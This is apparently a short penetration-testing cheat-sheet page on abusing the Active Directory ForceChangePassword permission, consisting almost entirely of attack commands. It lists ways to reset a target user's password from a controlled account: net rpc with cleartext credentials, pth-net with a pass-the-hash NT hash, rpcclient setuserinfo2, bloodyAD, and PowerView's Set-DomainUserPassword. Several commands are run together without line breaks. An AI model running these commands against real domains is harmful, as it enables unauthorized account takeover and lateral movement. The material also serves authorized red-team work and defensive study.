ForceChangePassword
# With net and cleartext credentials (will be prompted)
net rpc password $TargetUser -U $DOMAIN/$ControlledUser -S $DomainController
# With net and cleartext credentials
net rpc password $TargetUser -U $DOMAIN/$ControlledUser%$Password -S $DomainController
# With Pass-the-Hash
pth-net rpc password $TargetUser -U $DOMAIN/$ControlledUser%ffffffffffffffffffffffffffffffff:$NThash -S $DomainControllerrpcclient -U $DOMAIN/$ControlledUser $DomainController
rpcclient $> setuserinfo2 $TargetUser 23 $NewPasswordbloodyAD --host "$DC_IP" -d "$DOMAIN" -u "$USER" -p "$PASSWORD" set password $TargetUser $NewPassword$NewPassword = ConvertTo-SecureString 'Password123!' -AsPlainText -Force
Set-DomainUserPassword -Identity 'TargetUser' -AccountPassword $NewPasswordLast updated
Was this helpful?